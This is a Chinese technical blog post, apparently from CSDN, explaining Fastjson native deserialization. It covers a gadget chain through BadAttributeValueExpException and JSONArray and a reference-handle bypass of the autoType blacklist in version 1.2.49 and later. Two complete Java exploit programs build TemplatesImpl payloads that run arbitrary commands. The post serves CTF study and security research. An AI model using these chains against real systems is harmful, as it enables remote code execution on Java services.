【Web】浅聊Fastjson原生反序列化——原理与高版本绕过

最新推荐文章于 2024-04-11 17:57:36 发布
最新推荐文章于 2024-04-11 17:57:36 发布
阅读量1.7k 收藏 19
点赞数 35
文章标签: java反序列化 java ctf web 反序列化 fastjson fastjson原生反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/136927719
版权

目录

核心速览

分析

FastJson<=1.2.48

FastJson>=1.2.49

EXP

FastJson<=1.2.48

FastJson>=1.2.49

后话

核心速览

找到一个能够readObject的类,调用toString方法,然后调用toJSONString方法,再调用getter,实现反序列化利用。

利用链:

BadAttributeValueExpException#readObjct -> JSONArray#toString -> JSONArray#toJSONString -> getter

分析

FastJson<=1.2.48

JSONArray implement了Serializable接口,且本身与继承的父类JSON都没有实现readObject方法的重载(也就不会过滤黑名单类),此外,其父类JSON类的toString方法可以触发toJSONString方法

JSON#toString

JSON#toJSONString 

使用 toJSONString 方法将一个 Java 对象转换为 JSON 字符串时,会自动调用对象的 getter 方法来获取属性的值

如果找到一个重写了readObject方法的类,能触发toString方法,就可以把利用链打通

很容易想到CC5用的BadAttributeValueExpException

至于getter的利用,主流打法分两种,TemplatesImpl和SignedObject二次反序列化

FastJson>=1.2.49

FastJson>=1.2.49时,若直接用FJ<=1.2.48的EXP来打会出现如下报错,autoType is not support

原因是FJ1.2.49版本后,JSONArray对readObject方法进行重载,加入了autoType的黑名单机制

大体流程如下

ObjectInputStream -> readObject -> SecureObjectInputStream -> readObject -> resolveClass -> checkAutoType

其是针对JSONArray这个类的反序列化入口,而真正安全的措施应该是做一个统一反序列化的入口,但这样有点性能和安全不能兼顾的意思

(很多CTF题做的输入流过滤就是用的后者,如极客巅峰2023BabyURL,就不能用我们下面讲的引用类型来直接绕过)

 

checkAutoType中ban掉了一些恶意类,症结也就在这了

如何绕过呢?

在 Java 中,readObject 方法和 readHandle 方法都是 ObjectInputStream 类中用于反序列化对象的方法

  1. readObject 方法:

    • readObject 方法是 ObjectInputStream 类中用于反序列化对象的核心方法之一。
    • 当使用 readObject 方法时,ObjectInputStream 会读取序列化数据流,并将其转换为相应的对象。
    • readObject 方法会触发对象的反序列化过程,包括读取对象的数据并创建对象实例。
    • 在反序列化过程中,readObject 方法会处理对象的各种字段和属性,确保正确地恢复对象的状态。

  2. readHandle 方法:

    • readHandle 方法是 ObjectInputStream 类中用于处理对象替代句柄(object replacement handle)的方法。
    • 当序列化数据中存在对象替代句柄时,可以使用 readHandle 方法来恢复对应的实际对象。
    • readHandle 方法主要用于处理对象之间的引用关系,避免重复序列化相同的对象数据。
    • 与 readObject 方法不同,readHandle 方法不会触发对象的完整反序列化过程,而是主要用于处理对象之间的引用关系。

在使用 readHandle 来反序列化对象的过程中,不会触发 resolveClass 方法,也就不会走到checkAutoType,从而绕过黑名单检测

什么时候反序列化会走readHandle?

当向List、set、map这些涉及哈希表的类型中写入对象时,会在handles这个哈希表中建立从对象到引用的映射,当再次写入同一对象时,在handles这个hash表中查到了映射,就会通过writeHandle将重复对象以引用类型写入,自然readObject反序列化的时候也就会走到readHandle分支

也就是说我们要在反序列化的过程中在哈希表中先创建一个恶意对象到引用的映射,从而在真正对恶意对象第二次反序列化调用readHandle

结合EXP来看,我们可以这样实现:

1.反序列化时HashMap先通过ObjectInputStream#readObject恢复TemplatesImpl对象,在哈希表中先创建一个恶意对象到引用的映射

2.再恢复BadAttributeValueExpException对象

恢复过程:

2.1.由于BadAttributeValueExpException要恢复val对应的JSONArray对象,会触发JSONArray#readObject,其将这个过程委托给SecureObjectInputStream

2.2.在恢复JSONArray/JSONObject中的TemplatesImpl对象时,由于此时的第二个TemplatesImpl对象是引用类型,通过readHandle恢复对象的途中不会触发resolveClass,从而实现绕过

EXP

FastJson<=1.2.48

package org.FJ;

import com.alibaba.fastjson.JSONArray;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;


public class EXP {
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("a");
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(superClass);
        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("Runtime.getRuntime().exec(\"calc\");");
        clazz.addConstructor(constructor);
        byte[][] bytes = new byte[][]{clazz.toBytecode()};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setValue(templates, "_bytecodes", bytes);
        setValue(templates, "_name", "xxx");
        setValue(templates, "_tfactory", null);


        JSONArray jsonArray = new JSONArray();
        jsonArray.add(templates);

        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field valfield = val.getClass().getDeclaredField("val");
        valfield.setAccessible(true);
        valfield.set(val, jsonArray);
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(val);

        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}

FastJson>=1.2.49

package org.FJ;

import com.alibaba.fastjson.JSONArray;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;


public class EXP2 {
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static byte[] genPayload(String cmd) throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("a");
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(superClass);
        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("Runtime.getRuntime().exec(\""+cmd+"\");");
        clazz.addConstructor(constructor);
        clazz.getClassFile().setMajorVersion(49);
        return clazz.toBytecode();
    }

    public static void main(String[] args) throws Exception{


        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setValue(templates, "_bytecodes", new byte[][]{genPayload("calc")});
        setValue(templates, "_name", "xxx");
        setValue(templates, "_tfactory", null);

        JSONArray jsonArray = new JSONArray();
        jsonArray.add(templates);

        BadAttributeValueExpException bd = new BadAttributeValueExpException(null);
        setValue(bd,"val",jsonArray);

        HashMap hashMap = new HashMap();
        hashMap.put(templates,bd);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(hashMap);
        objectOutputStream.close();

        ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
        objectInputStream.readObject();
    }
}

后话

经p4d0rn师傅提醒,序列化的时候会带上很多不必要的属性,比如父类的类名之类的信息都会被带上,payload是有缩短的空间的
缩短payload其实只是图一乐,但有没有能力缩短payload又是另一回事了 

多看一看,借鉴借鉴,希望近期能把缩短payload的trick做出来吧

Z3r4y
关注
  • 35
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson-1.2.49.jar
08-08
fastjson可用于提取json数据,下载解压即可,我的java是1.8可用。
FastJson反序列化
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的反序列化方法,通过两个bean,进行封装
Fastjson反序列化
热门推荐
Christ1na的博客
11-15 1万+
fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。fastjson是目前java语言中最快的json库,其功能完备且使用简单,因而使用非常广泛。自fastjson在1.2.24版本爆出第一次漏洞到至今,有着多次的安全补丁更新和绕过
Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )
ZL_1618的博客
08-16 172
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
WEB攻防-Java安全&原生反序列化&SpringBoot攻防&heapdump提取&CVE
m0_59598029的博客
02-27 922
序列化是将Java对象转换成字节流的过程。而反序列化是将字节流转换成Java对象的过程,java序列化的数据一般会以标记()开头,base64编码的特征为rO0AB。JAVA常见的序列化和反序列化的方法有JAVA 原生序列化和JSON 类(fastjson、jackson)序列化两种方式。两种方式做的事情都是一样的,为什么要区分开来?因为利用起来有所不同fastjson、jackson等反序列化就用网上给的EXP、POC去测试。
FastJson反序列化分析
m0_49443776的博客
11-19 4096
本文主要针对FastJson反序列化过程进行详细分析,以及poc案例分析,留作学习笔记,以供日后复习
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
Fastjson是阿里巴巴开发的一款性能的JSON处理库,它提供了快速的序列化和反序列化能力,支持多种Java类型,包括JavaBean、集合、日期以及枚举等,并且无任何外部依赖,使得其在实际项目中得到广泛应用。...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
fastjson1.2.24反序列化RCE
最新发布
06-24
然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24反序列化RCE”漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
Javaweb安全——Fastjson反序列化利用
weixin_43610673的博客
10-13 4440
JSON.parseObject 的底层调用的还是 JSON.parse 方法,只是在 JSON.parse 的基础上做了一个封装。在JSON序列化时开启 SerializerFeature.WriteClassName 选项,序列化出来的结果会在开头加一个 @type 字段,值为进行序列化的类名。反序列化时带有@type 字段的序列化数据会得到对应类型的实例化对象。漏洞的还是Fastjson的功能,此功能可以反序列化的时候人为指定类,然后在利用指定的反序列化器过程中,如果满足条件则会去反射调用方法,以串联
老生常谈的fastjson安全问题,从实战深入反序列化漏洞原理
2201_75353421的博客
06-20 2421
反序列化java安全er避不开的技能点,也是非常难的一个点。这里我就先从我实战中遇到最多也是自己最熟悉的fastjson开始,这个漏洞老生长谈了,不过只要遇到就真是一个很好的点了。这里我先从效果开始再转战到原理,因为如果不懂代码,上来就分析代码就会让人望而却步。直接从漏洞利用开始,溯源到原理反倒是我这种非安全研究er的最好学习方式。
Java反序列化Fastjson基础
..
01-06 7363
最近摆烂了很久,来学习一下fastjson Fastjson 是 Alibaba 开发的 Java 语言编写的性能 JSON 库,用于将数据在 JSON 和 Java Object 之间互相转换。提供两个主要接口来分别实现序列化和反序列化操作。JSON.toJSONString 将 Java 对象转换为 json 对象,序列化的过程。JSON.parseObject/JSON.parse 将 json 对象重新变回 Java 对象;反序列化的过程所以可以简单的把 json 理解成是一个字符串。
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 2135
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。
序列化探索之四 - Fastjson
zou8944的博客
11-01 1563
开局一吐槽,Fastjson的文档,比Jackson还差。Jackson只是位置不明确,如果安下心来看看,还是能够理清楚的。而Fastjson是位置不明确,如果安下心来看看,还会发现,它的文档零零散散,中英文混杂,找不准主线在哪儿。我记得知乎上有个问题,fastjson这么快老外为啥还是热衷 jackson?,就这文档,让老外用个啥。 不过看还是要看的,毕竟它是目前主流序列化框架之一。老样子,我们还是从基本使用方法和原理分析两部分着手。 能力 Fastjson仅仅针对json,尚不支持其它任何格式,也没有看
fastjson反序列化漏洞学习(一)
一剑开天门!的博客
02-10 3690
Fastjson 反序列化漏洞产生的原因通常是由于 Fastjson 库在反序列化 JSON 数据时存在安全漏洞。这些漏洞可以被攻击者利用来执行任意代码、访问系统文件、读取敏感数据等危险操作。
fastjson反序列化
qq_37436172的博客
10-15 2678
Token定义 Token是Fastjson中定义的json字符串的同类型字段,即"{“、”["、数字、字符串等,用于分隔json字符串不同字段。 例如,{“姓名”:“张三”,“年龄”:“20”}是一个json字符串,在反序列化之前,需要先将其解析为 { 、 姓名、 :、 张三、 ,、 年龄、 :、 20、 }这些字段的Token流,随后再根据class反序列化为响应的对象。 在进行Token解析之前,json字符串对程序而言只是一个无意义的字符串。需要将json字符串解析为一个个的Token,并以Toke
fastjson 自定义反序列化
04-28
Fastjson 是一款效的 Java 序列化和反序列化工具,可以轻松地将 Java 对象转换为 JSON 格式的数据。自定义反序列化器可以在 Fastjson 默认反序列化器的基础上,对某些数据进行特殊处理。 Fastjson 自定义反序列化器需要实现 ObjectDeserializer 接口,并实现其 deserialize 方法。在该方法中,我们可以通过反射获取对象属性,并对其进行操作。同时,我们还可以通过 JSONReader 对象读取 JSON 数据流,并将其转换为相应的 Java 对象。最后,我们需要在使用 Fastjson 进行反序列化时,指定使用自定义反序列化器。 例如,假设我们有一个类 User,其中有一个 Age 字段,我们想要对 Age 字段进行特殊的反序列化。我们可以创建一个 AgeDeserializer 类,实现 ObjectDeserializer 接口: public class AgeDeserializer implements ObjectDeserializer { @Override public Integer deserialize(JSONParser parser, Type type, Object fieldName) { Integer age = parser.parseObject(Integer.class); // 对 age 进行特殊处理 return age; } } 然后,在使用 Fastjson 进行反序列化时,我们可以这样指定使用自定义的 AgeDeserializer: String json = "{\"name\":\"Tom\",\"age\":\"25\"}"; User user = JSON.parseObject(json, User.class, new AgeDeserializer()); 通过自定义反序列化器,我们可以方便地实现对某些数据的特殊处理,提反序列化的灵活性和效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值